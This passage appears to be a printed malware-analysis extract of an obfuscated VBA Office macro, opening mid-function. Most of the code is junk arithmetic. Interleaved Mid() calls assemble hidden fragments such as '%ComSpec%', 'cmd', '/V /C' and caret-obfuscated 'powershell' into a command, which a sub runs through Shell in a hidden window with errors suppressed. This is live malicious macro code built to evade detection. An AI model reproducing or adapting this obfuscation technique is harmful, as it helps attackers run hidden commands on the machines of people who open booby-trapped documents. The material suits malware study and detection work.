FLzcNPhmGm = QXaZcwaXIk + Mid(("djkU%=^wzvwWl7ipvj"), 3, 5)
rDoVMmovo = prELVHTu - ZwncBnowr / (4349937 + kZqHEJRX - 1971980 + olbkwXTQnpan)
YXkFsrGw = rfbvPmhTSLYXQ - zGLpvkj / (7169490 + MsFPUhDhj - 9352904 + zbdNClcSVaDM)
wQpTqiXcuG = WWKbziDIGSP - KWNlOdr / (5231632 + BWcwnKHOPnI - 6071741 + twXchBtbtJ)
sfcBniFd = GQiPYQZWRJhf + Mid(("wwIp%=p^o^w^erILOWaCEO5z"), 5, 10)
PTMPvqnF = UAhcLUv - qiGYkcPOmwphDI / (2487080 + ovvshIrwu - 4785014 + zpzVhwhDiH)
zTjBhKJZH = HmASUAWDwMnS - QZCMhnKdLDRYm / (5016108 + jWEiHCoI - 8578464 + oqaqcMKXK)
rUJItQGfz = IvUVqzH - iitiaNUaHEKmbQ / (1956343 + twjnjrGAbUAoBj - 8491993 + usaJVFQM)
YOWtJQtu = JsPPjGwLl + Mid(("cEk2O0ZEBIb8qmpdBtTsh^ell&&!%P5dkp3EvdtqlIKuwj3wC"), 20, 10)
aBPijwfNVjw = NULrcsGFNfZYMz - iqAbnfWRinAnD / (8170352 + DdHwwahi - 6496206 + zLwqcftNjuB)
wFrHkThJwA = voNqCdDbFDPF - vQOCRBHSzoU / (4608029 + FHHaWvGShSk - 1148984 + EfGXwvsOjO)
IVPTfiC = KOtuSwAtTcX - UihTzJNwdwuzcM / (5295273 + ZiMZsbQHCMAlS - 8314687 + ujimsOctFTQB)
LoYrzBtbtq = BEFMYdrlXc + Mid(("IB0Omset %UOpXb5BmZ0"), 6, 7)
wiYoHJcfXL = EsOZRmJcfmJAQt - idwlGFbaDn / (1189211 + uPKXwiiiuipKHw - 8280001 + PDTfYjmfXCJs)
AkXoVhr = SKmLsOMUPLV - PfDnmdKOpLzT / (5110262 + NdfzvUqBcU - 654207 + PhiQzswzIAjrkY)
nDFEWL = dmHKSkVAjpPPAr - DjkmOdkZL / (1468003 + cNNtoOWWMP - 4038190 + kOtjvbkd)
nhZkuoa = UwRGVIUoQ + Mid(("VqadfGHUamWvqIlV4hEE3NVtWEk4iuccc5"), 4, 7)
scRLNEXuWX = npBAsiiw - azYVzozbiXWS / (3175231 + jQMBTBZFnGltFa - 6843444 + TbzOZHZoXEPU)
qRjJvuESsuY = ZlpWvUjfdL - JULRkEjXrtEuVC / (3968285 + rYdOlEhOUw - 4247737 + FzFpPAEE)
fZAStuTw = HETVsdiUrTUavs - zzKFnwwn / (6557966 + RroOiUzPcj - 3861310 + stbCudcB)
aJJjcqG = GvwzHzKUtNvDzI + Mid(("KkZWCTDzuj0zmadUUOzcdBSdOL3u"), 5, 5)
kjCcNZViLJj = blqFMzWLSImpEQ - lCSLjoGjpYM / (5767510 + wdYDYvSpLoRciY - 8572842 + LBNZVjwsFEHUBA)
XwftCjN = zVYMokjRIwoZ - BiBQNldXz / (814633 + ShjwTnwnKHS - 1407309 + LDNckEb)
biCGlt = GiqWCrGQXJAR - uHElzVABPGjbwE / (1938274 + BnucvLwpbQ - 9281100 + XnzSqJQwJrmjb)
EdOXMGjsPi = KHwqSqzRzLQl + Mid(("zZk LBpLmvEkU%! pWULWN3pzwjL8BmOQzv2lz23pa"), 12, 5)
TSSisaERoH = BjIPJjYIibJQl - nNOJALBOUXhj / (1880763 + viRbMBHh - 7608590 + iFKSCPSqJTzii)
iScQFopXkc = VtmmOlic - PNzKhEjfGa / (4022781 + vBjMFEqXpJM - 9904755 + FTOVTBK)
jVnkX = iuECEkm - otIJlasDZI / (6341450 + EhFBAFclVJmYJ - 3962979 + GiKATDzB)
UUCiw = rbHuGnwsWWF + Mid(("mjaEwZcUOCTDzu%!!%cdtP"), 8, 11)
RBVojFKfjrU = LoYrzBtbtq + aJJjcqG + sfcBniFd + ndmqHWR + SPZftYaZ + FLzcNPhmGm + YOWtJQtu + UUCiw + nhZkuoa + EdOXMGjsPi
QDpTiaKvK = SBBpDBzIBE - GkzROmZPINo / (1473389 + pzKmzKKOcDr - 3699193 + RaIALBsW)
KTqCQoljB = dtVzGrNK - uQdhIzDVzGHBn / (2939267 + idUjjWYh - 5190241 + NZpRTRnAKzFjmh)
EMTmauGqi = VcWddUVi - luYODfo / (3876621 + cREzqmf - 3869370 + mHjoXvd)
End Function
Attribute VB_Name = "MzRPtsOY"
Function OTPmrJAVNqRJGc()
On Error Resume Next
msikSwzlZ = iiAnnUh - wCqfFwFu / (2608626 + tVJICzidRm - 7339566 + uswWAJawCXrQ)
ajBZS = nXHGwwGkqbauVj - JKCvWMI / (9569137 + jwwURSWdtOOb - 4431236 + TpfBDRXbfc)
RFmrYMkUrzX = msVwuhfZaW - AmTXFzB / (1305392 + ZmmiFqKEj - 1855940 + RTviaBhz)
JMwQFkw = mLvBBwLVw + Mid(("ZsdwqBLCSYFSwOORQ %C^om^S^p^Ec% FGIQBPHv"), 18, 19)
abczozulLcO = KzAFmqDXat - PljqozDPB / (4920723 + XplRQzcYUjjs - 1817608 + iUPrvKIIjljICt)
iKnCOZ = ILYwbcKUVZGv - YhisXvK / (5632727 + XGPaOIzlIuiqM - 4660389 + uiTTzuSp)
Otvpq = FkzCokHjF - nSjANCUjQM / (2466526 + MIbzpbqd - 8914004 + QAViJwz)
jrHEn = jBzARptifMaa + Mid(("YnQfsUucFGizCWadiqw ohd ioqwhd iotDWfLkiwGlhpaGJJsbZO"), 17, 22)
zhchqmVLf = KBdCtXqbqvj - bZhBifjsYmsZO / (5221341 + YmmHVYwkEn - 9707906 + GSVHcGEJSCm)
cawLwztvJHk = CWYGXIDnSDS - DoKUcpdOjDcaD / (6098059 + SJRBVzKEz - 13565 + MvjKJDzfDnwkh)
jnXVsqwlTw = ZYszuwDrrki - BzptkLU / (7000948 + hiZuZbXbcWZ - 7001099 + vbRFEBoVEw)
CWfpTisiXuz = mwlskoLiFR + Mid(("juVMljqusfbqwhjiDwjGpqNMjJuUGCiCl"), 12, 3)
EDzrLsbBC = EVXjPOOFQc - ObfGSvH / (5680343 + smXZhRZmJnY - 847953 + zAjiIFpkbrYz)
wrkwTV = jYizAsNOaSz - wwpcvcEzhdiXnn / (398324 + vQuzZFhAHMmfq - 3636255 + hmjJGzIfPU)
ONRDqtwuF = tFtGJNq - TJXzYtQoUj / (8062015 + GOGwkGdvom - 7134277 + fWLcHACZpQz)
zmiffCdctSc = IBBqKDkPwArt + Mid(("ZAgeui qwgeiqweqwe BlKcRIHadJGGEUji"), 3, 19)
uNSzzFIDKcK = vfwwWCjvljYsSB - ohTjQjqOtmvw / (2627905 + dwoGjbj - 5639186 + iAptfToR)
WPmjbNA = GiBdVPIMFQ - KaEWpHi / (6933282 + iaALXojbpKvF - 4114485 + riEAdZzXVP)
oNSQdMXmtTM = ADwTEYkEfo - hpFjihWuUAo / (405285 + rkGFKoKF - 7140295 + XlkHlmLBqkLwP)
jQEzbWIb = JoIQpKowZ + Mid(("fzlwqplcmd hhwjYnOSzzDs"), 8, 12)
fWXiDp = qiawCivwZlIJw - SAuVLIUXJiqPLj / (59354 + RUjHzGlAMMB - 8378182 + PRlZMjjizFWZT)
RsXWXELMiJ = vGmWLwuTnd - wMPtJzGcjtMEq / (9820371 + QzUPJijlptZpqt - 9326923 + iIiNXUooGPwmaj)
iLwhNAf = wXLhzwY - ISaZAjJQj / (6991383 + ivIlcwJfJumuLG - 8296581 + SiLzzFpZvzu)
DRzADwp = wqQBavXLBjcTRf + Mid(("iIiwuHGOsOwpEBPILuRSsVszEBORF /V /ClvqRt"), 30, 20)
LIrXP = PZVYPTJFq - YlzcGipfBVaM / (9093230 + shFkpjuaLiq - 3146203 + XhbizFM)
YHUOb = QdXAFwDjSsCdv - hNYPKrwaVmp / (5865756 + zZqaHilbE - 6503417 + kjrqslnmIrAO)
mjXWURGJ = kvUqqIl - aiGJcSvu / (1882121 + dfpfaAH - 6528347 + wDWazLlqMOvl)
wYWVtmFz = FwwMBdAGnmjlo + Mid(("sGjnjjshDfido & niUwqrwvci"), 11, 9)
chirllvaz = EUUiIYmHE - IwqcjjO / (3551668 + jPVVPbRRGLXm - 5028856 + UlrtNcXJREC)
FTmuKj = iZqILkVqwAi - EHqHfvhQiUWqrm / (171828 + JZzRSnssawAmR - 6920742 + TCspFlQdWXl)
spMoJjWJJ = NCzQYjfjZCRjQ - zjhvuzwqC / (7690765 + zuEtwbthufpahc - 580187 + DFQkMYrnjwac)
SjzfBBuYmjI = wZJFkjPSsrwoXi + Mid(("rNakquui qwUalJHNUWzwurcraD"), 5, 9)
TzzKcZ = WjIGzTrOvllDmY - QJzBRvz / (1450453 + OQBOJPbpMNBIf - 5565505 + HkXzmPIiClLdda)
LJmnsCBBIc = DXbSrjRd - fJvqZXv / (6995445 + DtjYzVaFmzcw - 7322813 + PGKdjNlNpHTTdT)
ELwriz = EipawZjaf - GslwSAFtKj / (6961075 + tPXvqDZFj - 8418188 + nhUnXpYi)
PmfdCqO = uXALRaobndbY + Mid(("zfc aOzXsDotzzcCOiaaGrGMRzhSNDFCRuln"), 3, 12)
OTPmrJAVNqRJGc = jQEzbWIb + SjzfBBuYmjI + zmiffCdctSc + jrHEn + CWfpTisiXuz + wYWVtmFz + JMwQFkw + DRzADwp + PmfdCqO
fiGZUzQWG = aSniolaDB - cBarPlwOwNhE / (7262743 + EknpCvZhSrFZTE - 8645484 + MUopFiEOKjBC)
YtfVjqdEz = BFJvjilpStVO - NPwrajZ / (5994941 + uXIYMjsdb - 7849353 + bSjjKvWcUQIj)
JsRGkzDYY = iKlnKWB - pSjdavjPhfJwKC / (7398344 + zjudHiXQNVkYu - 4413658 + AaXbqzjRWZVS)
End Function
Sub wrTPYEmLACm(EAAjHZChQv As String)
On Error Resume Next
LkMtzcBEs = lrFcwFXLU - IPnYaqnaCFm / (450747 + wPDrOiztjYpjj - 8982190 + lJUIwCiwz)
oSIoaBnfi = JMsNJjW - crwouwXpskiF / (7654742 + TGDvVJTil - 1846493 + ilDswKc)
Shell EAAjHZChQv, 0
aQGFwzYMR = ICBdNvtmKOKM - zFonPKUzw / (5012134 + iXHOHDX - 1728457 + jViIXRpJGlwRN)
wIzJMICzn = czzqofiH - BUibWjQwUKqLd / (6916837 + YwOzrOGuv - 1903209 + JYaBiciE)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.